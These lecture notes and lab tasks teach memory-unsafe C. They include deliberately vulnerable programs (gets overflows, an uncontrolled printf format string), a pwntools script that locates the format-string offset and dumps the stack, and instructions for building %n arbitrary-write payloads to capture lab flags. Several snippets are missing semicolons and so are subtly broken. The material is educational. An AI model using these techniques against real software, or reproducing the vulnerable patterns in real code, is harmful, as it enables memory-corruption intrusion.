Lecture Notes
This lecture will present an overview over issues involving Buffers overflow, underflow, or otherwise incorrectly used.
Download here
Related files:
Practical tasks
This guide will complement the lecture slides and present code and descriptions to enable exploitation of buffer vulnerabilities.
Memory Structure and Variables
Languages such as C/C++, but not only, allow a great flexibility in the use of variables. From a perspective of types, these languages are not fully type-safe, as the safety of the variable types is limited, and can be commonly circumvented by developers. Recent compilers will provide a great amount of information to developers so that they avoid type errors, but that doesn’t avoid developers from casting variables to incompatible types, especially when dealing with pointers to structures (The cast is valid, but the content structure is not compatible).
Then there is the notion of memory safety, which is simply not present in these languages. A language that is not memory safe will allow developers to access memory with great freedom, exposing the allocated virtual address to the program.
The following program (not_type_safe.c
) will provide an insight of the problem. Compile it and run it on your computer. Try to explain the values printed.
int aux = 42 // Integer
int *value = &aux // Pointer to Integer
// Correct usage
printf("%d\n", *value)
// Reading memory after the variable
printf("%d\n", *(value + 4))
// Reading memory before the variable
printf("%d\n", *(value - 4))
// Cast to variable with different storage
printf("%f\n", *((double*) &value))
// Cast to variable with different size
printf("%llu\n", *((unsigned long long*) &value))
The result is something like, which includes the value 42
but also other variations.
42
32693
1
0.000000
140737456555452
A similar program not_memory_safe.c
will specifically explore memory safety with dynamic memory. Check it’s output.
char* buffer = (char*) malloc(10) // Buffer with 10 bytes
char* str = buffer // Pointer to buffer
free(buffer)
// Free buffer!
// Write after free (and write beyond buffer)
memcpy(str, "Hello World!!!!", 15)
// Read after free (and read beyond buffer)
printf("%s\n", str)
Different variable types will be allocated to different memory areas. This is intrinsic of each program and is broadly defined by how the program is compiled. When the program is loaded, the addresses may change, but they will still respect this notion of areas.
The following program (mem.c
) will print the address of several variables that you may find in a program. Some variables are local, some are global, some are static, some are dynamic. Then you also have program arguments and functions. During the creation of a program the programmer will decide how to declare a variable, and this will have some impact on where the variable is placed in memory.
const char cntvar[]="constant"
static char bssvar[4]
// ... OMITTED
int main(int argc, void** argv) {
FILE* fd
char line[1024]
unsigned int mask
unsigned int stack = (unsigned int) &argc
unsigned int heap = (unsigned int) malloc(sizeof(unsigned int))
unsigned int bss = (unsigned int) bssvar
unsigned int cnst = (unsigned int) cntvar
unsigned int text = (unsigned int) &main
memset(&mask,0xff,sizeof(mask))
mask ^= getpagesize() -1
printf("Internal Variables (Page = %u)\n", getpagesize())
printf("&argc = %08x -> stack = %08x\n", stack, stack & mask)
printf("malloc = %08x -> heap = %08x\n", heap, heap & mask)
printf("bssvar = %08x -> bss = %08x\n", bss, bss & mask)
printf("cntvar = %08x -> const = %08x\n", cnst,cnst & mask)
printf("&main = %08x -> text = %08x\n", text,text & mask)
}
You can compile the program with gcc -g -o mem mem.c
.
NOTE: Recent versions of GCC implement several mitigations to some of the attacks here described. Because the programs we are going to use are small, which reduces the amount of artifacts, it could be better to use an older GCC using docker. You can run it with docker run –rm -ti -v $(pwd):/host gcc:8 gcc FLAGS -o /host/output /host/input.c
Task:
- Compile and run the program
- Match the addresses printed with the different variable types
- Change the location of a variable, or create others of the same type, and see how it affects the resulting address.
The program also allocates memory in the program stack, by calling a function recursively until all memory is exhausted.
void foo(int argc, unsigned int mask, unsigned int c, unsigned int m)
{
char a[4096*0x100]
unsigned int stack = (unsigned int) &argc
printf("foo [%03u]: &argc = %08x -> stack = %08x\n",c,stack, stack & mask)
if(c < m)
foo(argc,mask,c+1, m)
}
Each new function will allocate a variable stack
with the value of the argc
argument (this could be avoided, and is here for clarification), and then allocates a variable named a
of size 4096 * 0x100. 4096 (or 0x1000) is the standard page size, while 0x100 will set the number of pages. The larger this value, the quicker the program exhausts all memory.
A possible result would be:
foo [000]: &argc = bfeb8140 -> stack = bfeb8000
foo [001]: &argc = bfdb8110 -> stack = bfdb8000
foo [002]: &argc = bfcb80e0 -> stack = bfcb8000
foo [003]: &argc = bfbb80b0 -> stack = bfbb8000
foo [004]: &argc = bfab8080 -> stack = bfab8000
foo [005]: &argc = bf9b8050 -> stack = bf9b8000
foo [006]: &argc = bf8b8020 -> stack = bf8b8000
foo [007]: &argc = bf7b7ff0 -> stack = bf7b7000
foo [008]: &argc = bf6b7fc0 -> stack = bf6b7000
You should notice that stack allocation grows from higher address to lower addresses. Depending on your system configuration, addresses presented may be constant or slightly random.
Tasks:
- Take notice of how the addresses in your system, and how memory usage evolves.
- Run it multiple times.
Variable allocation
Program state is considered to be ephemeral and resides in memory areas specifically allocated for this purpose. Each function will allocate a new stack frame with local variables, and in some calling conventions, arguments to other functions called. Although when developing an application we use variables with specific names, when the code is compiled, variables are only memory spaces. If the language as weak, or no memory management features, access may be totally unconstrained and writing before or beyond the variable start may be a problem.
Considering the following program, which declares two variables buffer
and message
. buffer
is a char
array with 5 bytes, while message
is an array initialized to Hello World
.
The for
cycle present will write the value A
to buffer, but instead of writing only 5 bytes, it will write 15 bytes. The question that arises is, where are these bytes going to?
The program also prints the variable message
before and after the the cycle, so it may help us finding this.
To check what happens, save to code to bo.c
, compile the program with gcc -o bo bo.c
, and execute it ./bo
. What you will see is a basic overflow, but more on this later.
#include <stdio.h>
void main(int argc, char* argv[]){
char message[] = "Hello World"
char buffer[5]
int i
printf("buffer=%s message=%s\n", buffer, message)
for(i = 0, i < 15, i++) {
buffer[i] = 'A'
}
printf("buffer=%s message=%s\n", buffer, message)
}
Another file available (mem_local.c
) will also print the value of several variables. Can be used to see how location declaration affects actual memory allocation.
Tasks:
- Compile the program and execute it.
- What can you conclude about memory structure of these variables
- Instead of filling the
buffer
withA
, fill it with a variable value (e.g.'A' + i
)
Buffer Overflows and TOCTOU
Many operations and not atomic, and specifically when the Time Of Check to Time Of Use is higher than 0, it may be possible to invalidate the check, or to change the value of the check, allowing access to additional resources.
The following example code is a crude demonstration of TOCTOU, which can be controlled through a Buffer Overflow. Specifically, the message
variable can be used to override the allowed
variable, essentially bypassing the previous check.
int main() {
char allowed = 0
char password[8]
char username[8]
char message[32]
puts("username:")
gets(username)
puts("password:")
gets(password)
allowed = strcmp("admin", username) + \
strcmp("topsecrt", password)
puts("message:")
gets(message)
// <-- Issue here
printf("user=%s pass=%s result=%d\n", username, \
password, allowed)
if(allowed == 0)
printf("Access granted. Message sent!\n")
else
printf("Access denied\n")
return 0
}
If you use gdb
to analyze the memory, you can check the order of the variables, and notice that message
is before allowed
. Therefore, an overflow of message
will write over allowed
. The amount of data to write depends on the distance between variables, which can be calculated. An attacker without access to the binary could need a brute force, but we won’t need it.
$p &allowed
0x7ffffffedf2f
$ p &username
0x7ffffffedf1f
$ p &password
0x7ffffffedf27
$ p &message
0x7ffffffedef0
Tasks:
- Compile the binary with these flags:
gcc -g -O0 -fno-stack-protector –o prog_2 prog_2.c
- Analyze the execution with different payloads
- Determine * What is the stack base address? * Where is the return information? * How many bytes can be entered to the message without overflow? * How many bytes can be written without damage? * What happens when an overflow is achieved? * How can the decision be subverted?
Format String Attacks
The Format String exploit occurs when the submitted data of an input string is evaluated as a command by the application. In this way, the attacker could execute code, read the stack, or cause a segmentation fault in the running application, causing new behaviors that could compromise the security or the stability of the system.
The attack could be executed when the application doesn’t properly validate the submitted input. In this case, if a Format String parameter, like %x
, is inserted into the posted data, the string is parsed by the Format Function, and the conversion specified in the parameters is executed. However, the Format Function is expecting more arguments as input, and if these arguments are not supplied, the function could read or write the memory.
Consider the following example, which has this vulnerability. The password is random, but the user is printed directly. Also, and invalid check is made, resulting the in the possibility of exploiting the username
variable in order to leak the password and then access the system.
Before you start it is important to determine the printf
argument offset. Typically in x86_64 architectures the value will be around 6, due to the calling convention in use. To determine it, provide a payload in the format b'aaaa%{offset}$x'
, and change the value of the offset until the output contains 61616161
. The use of pwntools
is recommended.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <sys/random.h>
char *ref_user = "root"
char ref_pass[1024]
void init_pass(char *s, const int len) {
getrandom(s, len, 0)
static const char alphanum[] = "0123456789#$!ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
for (int i = 0, i < len, ++i) {
s[i] = alphanum[((unsigned char) s[i]) % (sizeof(alphanum) - 1)]
}
s[len] = 0
}
void check_user_pass(char* ref_user, char* ref_pass) {
char username[64]
char password[64]
memset(username, 0, 64)
memset(password, 0, 64)
fprintf(stdout, "User: ")
fgets(username, sizeof(username), stdin)
printf(username)
fprintf(stdout,"\n")
if (strncmp(username, ref_user, strlen(ref_user)) != 0) {
printf("Invalid user\n")
exit(-1)
}
printf("Pass: ")
fgets(password, sizeof(password), stdin)
if (strncmp(password, ref_pass, strlen(password) != 0)) {
printf("Invalid password.\n")
exit(-2)
}
}
int main()
{
setbuf(stdout, NULL)
setbuf(stdin, NULL)
setbuf(stderr, NULL)
printf("Generating Random Pass...")
init_pass(ref_pass, 16)
printf("Done\n")
check_user_pass(ref_user, ref_pass)
printf("Access Granted\n")
}
Tasks:
- Compile the snippet and run it
- Find how you can provide some payload besides the username
- Using
%x
,%s
or%p
create a payload to get access to the system - You can use
x
to download the entire stack.
Arbitrary writes
The attack allows to use %n
for arbitrary writes to memory. Given the adequate control and knowledge of the stack, a great control is allowed. Consider the (printf_server.c
) program available in the webpage. The code base is much larger, with several potential flags to be explored using this vulnerability.
The following snippet allows using the program with pwntools
and determine the offset.
from pwn import *
bin = context.binary = ELF('server')
proc = process(bin.path)
proc.recvuntil(b"# ")
proc.sendline(b"2")
proc.recvuntil(b"# ")
offset = 0
# Find offset
for x in range(1, 20):
proc.sendline(f"aaaa%{x}$x end".encode())
output = proc.recvuntil(b"# ").strip().replace(b'\n',b' ')
if b"61616161" in output:
offset = x
break
# Dump Stack
for x in range(1, 64):
proc.sendline(f"%{x}$llx end".encode())
output = proc.recvuntil(b"# ").strip()
lines = output.decode().split("\n")
for line in lines:
if "end" in line:
value = int(line.split(" ")[0], 16)
print("{:02d} {:016x}".format(x, value))
break
The file (printf_server.c
) contains a value named aux
that will facilitate attacks, as it provides a variable with a known location to write data into, which can be used for conducting further writes.
It should be noticed that printf
stops processing the arguments when \x00
is found. This means that writing memory addresses will need for addresses to be written to the end of the payload.
The specifier %n
can be used as X%Y$n
where X
are several characters, and Y
represents the argument number. Also, we can use hhn
, hn
, n
, ln
, which will change the size of the write to 1,2,4 or 8 bytes. If X
equals 20 characters, and Y
equals 10, hn
will write 16 bits (2 bytes) with value 20 to the location pointed by position Y
.
Therefore, we can build a payload such as %Xc
, where X
will generate X
chars of padding, which will result in X
bytes being written. Then we can add %A$n
that use one existing location as a pointer to a memory location.
If we can provide %A$n_padding_ADDRESS
we can actually make A
points to the location of ADDRESS
. ADDRESS
contains an address where we want to write some data.
The full payload will be %Xc%A$n_padding_ADDRESS
. The size of the _padding_
needs to be adjusted to each use case, as the argument number A
.
The process can be used for arbitrary reads if it is combined with %B$s
, where B
points the an address written by the previous exploit. It will be used as a pointer for a string, being equivalent to printf("%s", B)
, printing all memory until \x00
is found.
Tasks:
- Obtain the flags through multiple methods
-
secret0
is on the stack -secret1
is a global variable and not accessible through an argument number. It can be assessed with%s
-secret2
is not a variable but code, and can be accessed by dumping the program code. (Check the Memory Map)